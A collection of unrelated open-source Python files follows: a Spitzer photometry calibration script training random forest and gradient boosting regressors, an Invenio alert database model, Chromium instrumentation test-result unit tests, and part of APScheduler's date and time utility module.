ap.add_argument('-ica', '--do_ica' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with ICA preprocessing")
ap.add_argument('-rfi', '--do_rfi' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with PCA preprocessing")
ap.add_argument('-gbr', '--do_gbr' , required=False, type=bool, default=False, help="Use Gradient Boosting Regression with PCA preprocessing")
ap.add_argument('-rs' , '--random_state', required=False, type=bool, default=False, help="Use Gradient Boosting Regression with PCA preprocessing")
ap.add_argument('-pdb', '--pdb_stop' , required=False, type=bool, default=False, help="Stop the trace at the end with pdb.set_trace()")
ap.add_argument('-nj', '--n_jobs' , required=False, type=int , default=-1 , help="Number of cores to use Default:-1")
args = vars(ap.parse_args())
do_std = args['do_std']
do_pca = args['do_pca']
do_ica = args['do_ica']
do_rfi = args['do_rfi']
do_gbr = args['do_gbr']
pdb_stop= args['pdb_stop']
n_jobs = args['n_jobs']
if n_jobs == 1: print('WARNING: You are only using 1 core!')
# Check if requested to complete more than one operatiion
# if so
need_gc = sum([args[key] for key in args.keys() if 'do_' in key]) > 1
importance_filename = 'randForest_STD_feature_importances.txt'
if do_rfi and not len(glob(importance_filename)): do_std = True
import pandas as pd
import numpy as np
# import tensorflow as tf
# tf.logging.set_verbosity(tf.logging.ERROR)
import pdb
import warnings
warnings.filterwarnings("ignore")
import gc
from argparse import ArgumentParser
# from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, MinMaxScaler, minmax_scale
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, AdaBoostRegressor, GradientBoostingRegressor
from sklearn.decomposition import PCA, FastICA
from sklearn.externals import joblib
from sklearn.metrics import r2_score
from tqdm import tqdm
from glob import glob
# plt.rcParams['figure.dpi'] = 300
# from corner import corner
from time import time
start0 = time()
def setup_features(dataRaw, label='flux', notFeatures=[], transformer=PCA(whiten=True), feature_scaler=StandardScaler(),
label_scaler=None, verbose=True, returnAll=None):
"""Example function with types documented in the docstring.
For production level usage: All scaling and transformations must be done
with respect to the calibration data distributions
Args:
features (nD-array): Array of input raw features.
labels (1D-array): The second parameter.
transformer (int): The first parameter.
label_scaler (str): The second parameter.
feature_scaler (str): The second parameter.
Returns:
features_scaled_transformed, labels_scaled
.. _PEP 484:
https://github.com/ExoWanderer/
"""
# notFeatures = list(notFeatures)
# notFeatures.append(label) if label not in notFeatures else None
dataRaw = pd.read_csv(filename) if isinstance(dataRaw,str) else dataRaw
inputData = dataRaw.copy()
PLDpixels = pd.DataFrame({key:dataRaw[key] for key in dataRaw.columns if 'pix' in key})
print(''.format(PLDpixels.shape, PLDpixels.columns))
# PLDpixels = {}
# for key in dataRaw.columns.values:
# if 'pix' in key:
# PLDpixels[key] = dataRaw[key]
#
# PLDpixels = pd.DataFrame(PLDpixels)
PLDnorm = np.sum(np.array(PLDpixels),axis=1)
PLDpixels = (PLDpixels.T / PLDnorm).T
# Overwrite the PLDpixels entries with the normalized version
for key in dataRaw.columns:
if key in PLDpixels.columns:
inputData[key] = PLDpixels[key]
# testPLD = np.array(pd.DataFrame({key:inputData[key] for key in inputData.columns.values if 'pix' in key})) if verbose else None
# assert(not sum(abs(testPLD - np.array(PLDpixels))).all()) if verbose else None
# print('Confirmed that PLD Pixels have been Normalized to Spec') if verbose else None
labels = inputData[label].values
inputData = inputData.drop(label, axis=1) # remove
feature_columns = inputData.drop(notFeatures,axis=1).columns.values
features = inputData.drop(notFeatures,axis=1).values
print('Shape of Features Array is', features.shape) if verbose else None
if verbose: start = time()
labels_scaled = label_scaler.fit_transform(labels[:,None]).ravel() if label_scaler is not None else labels
features_scaled = feature_scaler.fit_transform(features) if feature_scaler is not None else features
features_trnsfrmd = transformer.fit_transform(features_scaled) if transformer is not None else features_scaled
print('took {} seconds'.format(time() - start)) if verbose else None
if returnAll == True:
return features_trnsfrmd, labels_scaled, dataRaw, transformer, label_scaler, feature_scaler
if returnAll == 'features':
return features_trnsfrmd
if returnAll == 'labels':
return labels_scaled
if returnAll == 'both with raw data':
features_trnsfrmd, labels_scaled, dataRaw
return features_trnsfrmd, labels_scaled
def predict_with_scaled_transformer(dataRaw, notFeatures=None, transformer=None, feature_scaler=None, label_scaler=None, verbose=False):
"""Example function with types documented in the docstring.
For production level usage: All scaling and transformations must be done
with respect to the calibration data distributions
Args:
features (nD-array): Array of input raw features.
labels (1D-array): The second parameter.
transformer (int): The first parameter.
label_scaler (str): The second parameter.
feature_scaler (str): The second parameter.
Returns:
features_scaled_transformed, labels_scaled
.. _PEP 484:
https://github.com/ExoWanderer/
"""
dataRaw = pd.read_csv(filename) if isinstance(dataRaw,str) else dataRaw
PLDpixels = pd.DataFrame({key:dataRaw[key] for key in dataRaw.columns if 'pix' in key})
# PLDpixels = {}
# for key in dataRaw.columns.values:
# if 'pix' in key:
# PLDpixels[key] = dataRaw[key]
# PLDpixels = pd.DataFrame(PLDpixels)
PLDnorm = np.sum(np.array(PLDpixels),axis=1)
PLDpixels = (PLDpixels.T / PLDnorm).T
inputData = dataRaw.copy()
for key in dataRaw.columns:
if key in PLDpixels.columns:
inputData[key] = PLDpixels[key]
if verbose:
testPLD = np.array(pd.DataFrame({key:inputData[key] for key in inputData.columns.values if 'pix' in key}))
assert(not sum(abs(testPLD - np.array(PLDpixels))).all())
print('Confirmed that PLD Pixels have been Normalized to Spec')
feature_columns = inputData.drop(notFeatures,axis=1).columns.values
features = inputData.drop(notFeatures,axis=1).values
labels = inputData['flux'].values
# **PCA Preconditioned Random Forest Approach**
if verbose: print('Performing PCA')
labels_scaled = label_scaler.transform(labels[:,None]).ravel() if label_scaler is not None else labels
features_scaled = feature_scaler.transform(features) if feature_scaler is not None else features
features_trnsfrmd = transformer.transform(features_scaled) if transformer is not None else features_scaled
return features_trnsfrmd, labels_scaled
files_in_directory = glob('./*')
# nRF_modes = 6
# perform_rf_mode = np.ones(nRF_modes, dtype=bool)
#
# set_of_save_files = ['./randForest_STD_approach.save',
# './randForest_PCA_approach.save',
# './randForest_ICA_approach.save',
# './randForest_RFI_approach.save',
# './randForest_RFI_PCA_approach.save',
# './randForest_RFI_ICA_approach.save']
#
# for k, sfile in enumerate(set_of_save_files):
# if sfile in files_in_directory:
# perform_rf_mode[k] = False
# ## Load CSVs data
spitzerCalNotFeatures = ['flux', 'fluxerr', 'dn_peak', 'xycov', 't_cernox', 'xerr', 'yerr', 'sigma_bg_flux']
spitzerCalFilename ='pmap_ch2_0p1s_x4_rmulti_s3_7.csv'
spitzerCalRawData = pd.read_csv(spitzerCalFilename)
spitzerCalRawData['fluxerr'] = spitzerCalRawData['fluxerr'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['bg_flux'] = spitzerCalRawData['bg_flux'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['sigma_bg_flux'] = spitzerCalRawData['sigma_bg_flux']/ np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['flux'] = spitzerCalRawData['flux'] / np.median(spitzerCalRawData['flux'].values)
spitzerCalRawData['bmjd_err'] = np.median(0.5*np.diff(spitzerCalRawData['bmjd']))
spitzerCalRawData['np_err'] = np.sqrt(spitzerCalRawData['yerr'])
n_PLD = 9
n_resamp= args['n_resamp']
resampling_inputs = ['flux', 'xpos', 'ypos', 'xfwhm', 'yfwhm', 'bg_flux', 'bmjd', 'np'] + ['pix{}'.format(k) for k in range(1,10)]
resampling_errors = ['fluxerr', 'xerr', 'yerr', 'xerr', 'yerr', 'sigma_bg_flux', 'bmjd_err', 'np_err'] + ['fluxerr']*n_PLD
spitzerCalResampled = {}
if n_resamp > 0:
print('Starting Resampling')
for colname, colerr in tqdm(zip(resampling_inputs, resampling_errors), total=len(resampling_inputs)):
if 'pix' in colname:
spitzerCalResampled[colname] = np.random.normal(spitzerCalRawData[colname], spitzerCalRawData[colname]*spitzerCalRawData['fluxerr'], size=(n_resamp,len(spitzerCalRawData))).flatten()
else:
spitzerCalResampled[colname] = np.random.normal(spitzerCalRawData[colname], spitzerCalRawData[colerr], size=(n_resamp,len(spitzerCalRawData))).flatten()
spitzerCalResampled = pd.DataFrame(spitzerCalResampled)
else:
print('No Resampling')
spitzerCalResampled = pd.DataFrame({colname:spitzerCalRawData[colname] for colname, colerr in tqdm(zip(resampling_inputs, resampling_errors), total=len(resampling_inputs))})
features_SSscaled, labels_SSscaled = setup_features(dataRaw = spitzerCalResampled,
notFeatures = [],#spitzerCalNotFeatures,
transformer = PCA(whiten=True), # THIS IS PCA-RF -- NOT DEFAULT
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = None)
pca_cal_features_SSscaled = features_SSscaled
nTrees = args['n_trees']
start = time()
print('Grabbing PCA', end=" ")
pca_cal_features_SSscaled, labels_SSscaled, spitzerCalRawData, \
pca_trnsfrmr, label_sclr, feature_sclr = setup_features(dataRaw = spitzerCalResampled,
notFeatures = [],#spitzerCalNotFeatures,
transformer = None,
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = True)
print(len(pca_cal_features_SSscaled))
print('took {} seconds'.format(time() - start))
if 'core' in args.keys():
core = args['core']
else:
from glob import glob
existing_saves = glob('randForest_GBR_PCA_approach_{}trees_{}resamp_*core.save'.format(nTrees, n_resamp))
core_nums = []
for fname in existing_saves:
core_nums.append(fname.split('randForest_GBR_PCA_approach_{}trees_{}resamp_'.format(nTrees, n_resamp))[-1].split('core.save')[0])
core = max(core_nums) + 1
label_sclr_save_name = 'spitzerCalLabelScaler_fit_{}resamp_{}core.save'.format(n_resamp, core)
feature_sclr_save_name = 'spitzerCalFeatureScaler_fit_{}resamp_{}core.save'.format(n_resamp, core)
pca_trnsfrmr_save_name = 'spitzerCalFeaturePCA_trnsfrmr_{}resamp_{}core.save'.format(n_resamp, core)
save_calibration_stacks = False
if label_sclr_save_name not in files_in_directory and label_sclr is not None: save_calibration_stacks = True
if feature_sclr_save_name not in files_in_directory and feature_sclr is not None: save_calibration_stacks = True
if pca_trnsfrmr_save_name not in files_in_directory and pca_trnsfrmr is not None: save_calibration_stacks = True
if save_calibration_stacks:
# *** For production level usage ***
# All scaling and transformations must be done with respect to the calibration data distributions
# - That means to use .transform instead of .fit_transform
# - See `predict_with_scaled_transformer`
# Need to Scale the Labels based off of the calibration distribution
joblib.dump(label_sclr , label_sclr_save_name)
# Need to Scale the Features based off of the calibration distribution
joblib.dump(feature_sclr, feature_sclr_save_name)
# Need to Transform the Scaled Features based off of the calibration distribution
joblib.dump(pca_trnsfrmr, pca_trnsfrmr_save_name)
if do_pca:
print('Performing PCA Random Forest')
randForest_PCA = RandomForestRegressor( n_estimators=nTrees,
n_jobs=n_jobs,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
# random_state=random_state,
verbose=True,
warm_start=True)
print('Feature Shape: {}\nLabel Shape: {}'.format(pca_cal_features_SSscaled.shape, labels_SSscaled.shape))
start=time()
randForest_PCA.fit(pca_cal_features_SSscaled, labels_SSscaled)
randForest_PCA_oob = randForest_PCA.oob_score_
randForest_PCA_pred= randForest_PCA.predict(pca_cal_features_SSscaled)
randForest_PCA_Rsq = r2_score(labels_SSscaled, randForest_PCA_pred)
print('PCA Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_PCA_oob*100, randForest_PCA_Rsq*100, time()-start))
joblib.dump(randForest_PCA, 'randForest_PCA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_PCA, randForest_PCA_pred
gc.collect();
if do_gbr:
trainX, testX, trainY, testY = train_test_split(pca_cal_features_SSscaled, labels_SSscaled, test_size=0.25)
print('Performing Gradient Boosting Regression with PCA Random Forest and Quantile Loss')
randForest_PCA_GBR = GradientBoostingRegressor(loss='quantile',
learning_rate=0.1,
n_estimators=nTrees,
# n_jobs=n_jobs,
# bootstrap=True,
# oob_score=True,
subsample=1.0,
criterion='friedman_mse',
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_depth=3,#None,
min_impurity_decrease=0.0,
min_impurity_split=None,
init=None,
# random_state=42,
max_features='auto',
alpha=0.9,
verbose=True,
max_leaf_nodes=None,
warm_start=True,
presort='auto')
print(pca_cal_features_SSscaled.shape, labels_SSscaled.shape)
start=time()
randForest_PCA_GBR.fit(trainX, trainY)
randForest_PCA_GBR_pred_train = randForest_PCA_GBR.predict(trainX)
randForest_PCA_GBR_pred_test = randForest_PCA_GBR.predict(testX)
randForest_PCA_GBR_Rsq_train = r2_score(trainY, randForest_PCA_GBR_pred_train)
randForest_PCA_GBR_Rsq_test = r2_score(testY , randForest_PCA_GBR_pred_test )
print('PCA Pretrained Random Forest:\n\tTrain R^2 Score: {:.3f}%\n\tTest R^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_PCA_GBR_Rsq_train*100, randForest_PCA_GBR_Rsq_test*100, time()-start))
joblib.dump(randForest_PCA_GBR, 'randForest_GBR_PCA_approach_{}trees_{}resamp_{}core.save'.format(nTrees, n_resamp, core))
if need_gc:
del randForest_PCA, randForest_PCA_pred
gc.collect();
if do_std:
# **Standard Random Forest Approach**
# for nComps in range(1,spitzerData.shape[1]):
print('Performing STD Random Forest')
randForest_STD = RandomForestRegressor( n_estimators=nTrees, \
n_jobs=n_jobs, \
criterion='mse', \
max_depth=None, \
min_samples_split=2, \
min_samples_leaf=1, \
min_weight_fraction_leaf=0.0, \
max_features='auto', \
max_leaf_nodes=None, \
bootstrap=True, \
oob_score=True, \
# random_state=42, \
verbose=True, \
warm_start=True)
start=time()
randForest_STD.fit(features_SSscaled, labels_SSscaled)
# Save for Later
importances = randForest_STD.feature_importances_
np.savetxt(importance_filename, importances)
randForest_STD_oob = randForest_STD.oob_score_
randForest_STD_pred= randForest_STD.predict(features_SSscaled)
randForest_STD_Rsq = r2_score(labels_SSscaled, randForest_STD_pred)
print('Standard Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_STD_oob*100, randForest_STD_Rsq*100, time()-start))
joblib.dump(randForest_STD, 'randForest_STD_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_STD, randForest_STD_pred
gc.collect();
if do_ica:
# for nComps in range(1,spitzerData.shape[1]):
print('Performing ICA Random Forest')
start = time()
print('Performing ICA', end=" ")
ica_cal_feature_set = setup_features(dataRaw = spitzerCalResampled,
notFeatures = spitzerCalNotFeatures,
transformer = FastICA(),
feature_scaler= StandardScaler(),
label_scaler = None,
verbose = True,
returnAll = 'features')
print('took {} seconds'.format(time() - start))
randForest_ICA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_ICA.fit(ica_cal_feature_set, labels_SSscaled)
randForest_ICA_oob = randForest_ICA.oob_score_
randForest_ICA_pred= randForest_ICA.predict(ica_cal_feature_set)
randForest_ICA_Rsq = r2_score(labels_SSscaled, randForest_ICA_pred)
print('ICA Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_ICA_oob*100, randForest_ICA_Rsq*100, time()-start))
joblib.dump(randForest_ICA, 'randForest_ICA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_ICA, randForest_ICA_oob, randForest_ICA_pred, randForest_ICA_Rsq
gc.collect();
if do_rfi:
# **Importance Sampling**
print('Computing Importances for RFI Random Forest')
importances = np.loadtxt(importance_filename)
indices = np.argsort(importances)[::-1]
cumsum = np.cumsum(importances[indices])
nImportantSamples = np.argmax(cumsum >= 0.95) + 1
# **Random Forest Pretrained Random Forest Approach**
rfi_cal_feature_set = features_SSscaled.T[indices][:nImportantSamples].T
# for nComps in range(1,spitzerData.shape[1]):
print('Performing RFI Random Forest')
randForest_RFI = RandomForestRegressor( n_estimators=nTrees, \
n_jobs=n_jobs, \
criterion='mse', \
max_depth=None, \
min_samples_split=2, \
min_samples_leaf=1, \
min_weight_fraction_leaf=0.0, \
max_features='auto', \
max_leaf_nodes=None, \
bootstrap=True, \
oob_score=True, \
# random_state=42, \
verbose=True, \
warm_start=True)
start=time()
randForest_RFI.fit(rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_oob = randForest_RFI.oob_score_
randForest_RFI_pred= randForest_RFI.predict(rfi_cal_feature_set)
randForest_RFI_Rsq = r2_score(labels_SSscaled, randForest_RFI_pred)
print('RFI Pretrained Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(randForest_RFI_oob*100, randForest_RFI_Rsq*100, time()-start))
joblib.dump(randForest_RFI, 'randForest_RFI_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI, randForest_RFI_oob, randForest_RFI_pred, randForest_RFI_Rsq
gc.collect();
do_rfi_pca=False
if do_rfi_pca:
# **PCA Pretrained Random Forest Approach**
print('Performing PCA on RFI', end=" ")
start = time()
pca = PCA(whiten=True)
pca_rfi_cal_feature_set = pca.fit_transform(rfi_cal_feature_set)
print('took {} seconds'.format(time() - start))
print('Performing RFI with PCA Random Forest')
randForest_RFI_PCA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_RFI_PCA.fit(pca_rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_PCA_oob = randForest_RFI_PCA.oob_score_
randForest_RFI_PCA_pred= randForest_RFI_PCA.predict(pca_rfi_cal_feature_set)
randForest_RFI_PCA_Rsq = r2_score(labels_SSscaled, randForest_RFI_PCA_pred)
print('RFI Pretrained with PCA Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_RFI_PCA_oob*100, randForest_RFI_PCA_Rsq*100, time()-start))
joblib.dump(randForest_RFI_PCA, 'randForest_RFI_PCA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI_PCA, randForest_RFI_PCA_oob, randForest_RFI_PCA_pred, randForest_RFI_PCA_Rsq
gc.collect();
do_rfi_ica = False
if do_rfi_ica:
# **ICA Pretrained Random Forest Approach**
print('Performing ICA on RFI', end=" ")
ica = FastICA()
start = time()
ica_rfi_cal_feature_set = ica.fit_transform(rfi_cal_feature_set)
print('took {} seconds'.format(time() - start))
print('Performing RFI with ICA Random Forest')
randForest_RFI_ICA = RandomForestRegressor( n_estimators=nTrees,
criterion='mse',
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.0,
max_features='auto',
max_leaf_nodes=None,
bootstrap=True,
oob_score=True,
n_jobs=n_jobs,
# random_state=42,
verbose=True,
warm_start=True)
start=time()
randForest_RFI_ICA.fit(ica_rfi_cal_feature_set, labels_SSscaled)
randForest_RFI_ICA_oob = randForest_RFI_ICA.oob_score_
randForest_RFI_ICA_pred= randForest_RFI_ICA.predict(ica_rfi_cal_feature_set)
randForest_RFI_ICA_Rsq = r2_score(labels_SSscaled, randForest_RFI_ICA_pred)
print('RFI Pretrained with ICA Random Forest:\n\tOOB Score: {:.3f}%\n\tR^2 score: {:.3f}%\n\tRuntime: {:.3f} seconds'.format(
randForest_RFI_ICA_oob*100, randForest_RFI_ICA_Rsq*100, time()-start))
joblib.dump(randForest_RFI_ICA, 'randForest_RFI_ICA_approach_{}trees_{}resamp.save'.format(nTrees, n_resamp))
if need_gc:
del randForest_RFI_ICA, randForest_RFI_ICA_oob, randForest_RFI_ICA_pred, randForest_RFI_ICA_Rsq
gc.collect();
print('\n\nFull Operation took {:.2f} minutes'.format((time() - start0)/60))
if pdb_stop: pdb.set_trace()
|
mit
|
SDSG-Invenio/invenio
|
invenio/modules/alerts/models.py
|
13
|
2619
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2011, 2012, 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Alert database models."""
# General imports.
from invenio.ext.sqlalchemy import db
# Create your models here.
from invenio.modules.accounts.models import User
from invenio.modules.baskets.models import BskBASKET
from invenio.modules.search.models import WebQuery
class UserQueryBasket(db.Model):
"""Represent a UserQueryBasket record."""
__tablename__ = 'user_query_basket'
id_user = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(User.id), nullable=False,
server_default='0', primary_key=True)
id_query = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(WebQuery.id), nullable=False,
server_default='0', primary_key=True,
index=True)
id_basket = db.Column(db.Integer(15, unsigned=True),
db.ForeignKey(BskBASKET.id), nullable=False,
server_default='0', primary_key=True,
index=True)
frequency = db.Column(db.String(5), nullable=False, server_default='',
primary_key=True)
date_creation = db.Column(db.Date, nullable=True)
date_lastrun = db.Column(db.Date, nullable=True,
server_default='1900-01-01')
alert_name = db.Column(db.String(30), nullable=False,
server_default='', index=True)
alert_desc = db.Column(db.Text)
alert_recipient = db.Column(db.Text)
notification = db.Column(db.Char(1), nullable=False,
server_default='y')
user = db.relationship(User, backref='query_baskets')
webquery = db.relationship(WebQuery, backref='user_baskets')
basket = db.relationship(BskBASKET, backref='user_queries')
__all__ = ('UserQueryBasket', )
|
gpl-2.0
|
was4444/chromium.src
|
build/android/pylib/instrumentation/instrumentation_test_instance_test.py
|
16
|
3588
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for instrumentation.TestRunner."""
import unittest
from pylib.base import base_test_result
from pylib.constants import host_paths
from pylib.instrumentation import instrumentation_test_instance
with host_paths.SysPath(host_paths.PYMOCK_PATH):
import mock # pylint: disable=import-error
class InstrumentationTestInstanceTest(unittest.TestCase):
def setUp(self):
options = mock.Mock()
options.tool = ''
def testGenerateTestResults_noStatus(self):
results = instrumentation_test_instance.GenerateTestResults(
None, None, [], 0, 1000)
self.assertEqual([], results)
def testGenerateTestResults_testPassed(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.PASS, results[0].GetType())
def testGenerateTestResults_testSkipped_true(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'test_skipped': 'true',
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.SKIP, results[0].GetType())
def testGenerateTestResults_testSkipped_false(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(0, {
'test_skipped': 'false',
}),
(0, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.PASS, results[0].GetType())
def testGenerateTestResults_testFailed(self):
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(-2, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.FAIL, results[0].GetType())
def testGenerateTestResults_testUnknownException(self):
stacktrace = 'long\nstacktrace'
statuses = [
(1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
}),
(-1, {
'class': 'test.package.TestClass',
'test': 'testMethod',
'stack': stacktrace,
}),
]
results = instrumentation_test_instance.GenerateTestResults(
None, None, statuses, 0, 1000)
self.assertEqual(1, len(results))
self.assertEqual(base_test_result.ResultType.FAIL, results[0].GetType())
self.assertEqual(stacktrace, results[0].GetLog())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
bsd-3-clause
|
jroyal/plexpy
|
lib/apscheduler/util.py
|
32
|
12956
|
"""This module contains several handy functions primarily meant for internal use."""
from __future__ import division
from datetime import date, datetime, time, timedelta, tzinfo
from inspect import isfunction, ismethod, getargspec
from calendar import timegm
import re
from pytz import timezone, utc
import six
try:
from inspect import signature
except ImportError: # pragma: nocover
try:
from funcsigs import signature
except ImportError:
signature = None
__all__ = ('asint', 'asbool', 'astimezone', 'convert_to_datetime', 'datetime_to_utc_timestamp',
'utc_timestamp_to_datetime', 'timedelta_seconds', 'datetime_ceil', 'get_callable_name', 'obj_to_ref',
'ref_to_obj', 'maybe_ref', 'repr_escape', 'check_callable_args')
class _Undefined(object):
def __nonzero__(self):
return False
def __bool__(self):
return False
def __repr__(self):
return '<undefined>'
undefined = _Undefined() #: a unique object that only signifies that no value is defined
def asint(text):
"""
Safely converts a string to an integer, returning None if the string is None.
:type text: str
:rtype: int
"""
if text is not None:
return int(text)
def asbool(obj):
"""
Interprets an object as a boolean value.
:rtype: bool
"""
if isinstance(obj, str):
obj = obj.strip().lower()
if obj in ('true', 'yes', 'on', 'y', 't', '1'):
return True
if obj in ('false', 'no', 'off', 'n', 'f', '0'):
return False
raise ValueError('Unable to interpret value "%s" as boolean' % obj)
return bool(obj)
def astimezone(obj):
"""
Interprets an object as a timezone.
:rtype: tzinfo
"""
if isinstance(obj, six.string_types):
return timezone(obj)
if isinstance(obj, tzinfo):
if not hasattr(obj, 'localize') or not hasattr(obj, 'normalize'):
raise TypeError('Only timezones from the pytz library are supported')
if obj.zone == 'local':
raise ValueError('Unable to determine the name of the local timezone -- use an explicit timezone instead')
return obj
if obj is not None:
raise TypeError('Expected tzinfo, got %s instead' % obj.__class__.__name__)
_DATE_REGEX = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})'
r'(?: (?P<hour>\d{1,2}):(?P<minute>\d{1,2}):(?P<second>\d{1,2})'
r'(?:\.(?P<microsecond>\d{1,6}))?)?')
def convert_to_datetime(input, tz, arg_name):
"""
Converts the given object to a timezone aware datetime object.
If a timezone aware datetime object is passed, it is returned unmodified.
If a native datetime object is passed, it is given the specified timezone.
If the input is a string, it is parsed as a datetime with the given timezone.
Date strings are accepted in three different forms: date only (Y-m-d),
date with time (Y-m-d H:M:S) or with date+time with microseconds
(Y-m-d H:M:S.micro).
:param str|datetime input: the datetime or string to convert to a timezone aware datetime
:param datetime.tzinfo tz: timezone to interpret ``input`` in
:param str arg_name: the name of the argument (used in an error message)
:rtype: datetime
"""
if input is None:
return
elif isinstance(input, datetime):
datetime_ = input
elif isinstance(input, date):
datetime_ = datetime.combine(input, time())
elif isinstance(input, six.string_types):
m = _DATE_REGEX.match(input)
if not m:
raise ValueError('Invalid date string')
values = [(k, int(v or 0)) for k, v in m.groupdict().items()]
values = dict(values)
datetime_ = datetime(**values)
else:
raise TypeError('Unsupported type for %s: %s' % (arg_name, input.__class__.__name__))
if datetime_.tzinfo is not None:
return datetime_
if tz is None:
raise ValueError('The "tz" argument must be specified if %s has no timezone information' % arg_name)
if isinstance(tz, six.string_types):
tz = timezone(tz)
try:
return tz.localize(datetime_, is_dst=None)
except AttributeError:
raise TypeError('Only pytz timezones are supported (need the localize() and normalize() methods)')
def datetime_to_utc_timestamp(timeval):
"""
Converts a datetime instance to a timestamp.
:type timeval: datetime
:rtype: float
"""
if timeval is not None:
return timegm(timeval.utctimetuple()) + timeval.microsecond / 1000000
def utc_timestamp_to_datetime(timestamp):
"""
Converts the given timestamp to a datetime instance.
:type timestamp: float
:rtype: datetime
"""
if timestamp is not None:
return datetime.fromtimestamp(timestamp, utc)
def timedelta_seconds(delta):
"""
Converts the given timedelta to seconds.
:type delta: timedelta
:rtype: float
"""
return delta.days * 24 * 60 * 60 + delta.seconds + \
delta.microseconds / 1000000.0
def datetime_ceil(dateval):
"""
Rounds the given datetime object upwards.
:type dateval: datetime
"""
if dateval.microsecond > 0:
return dateval + timedelta(seconds=1, microseconds=-dateval.microsecond)
return dateval
def datetime_repr(dateval):
return dateval.strftime('%Y-%m-%d %H:%M:%S %Z') if dateval else 'None'
def get_callable_name(func):
"""
Returns the best available display name for the given function/callable.
:rtype: str
"""
# the easy case (on Python 3.3+)
if hasattr(func, '__qualname__'):
return func.__qualname__
# class methods, bound and unbound methods
f_self = getattr(func, '__self__', None) or getattr(func, 'im_self', None)
if f_self and hasattr(func, '__name__'):
f_class = f_self if isinstance(f_self, type) else f_self.__class__
else:
f_class = getattr(func, 'im_class', None)
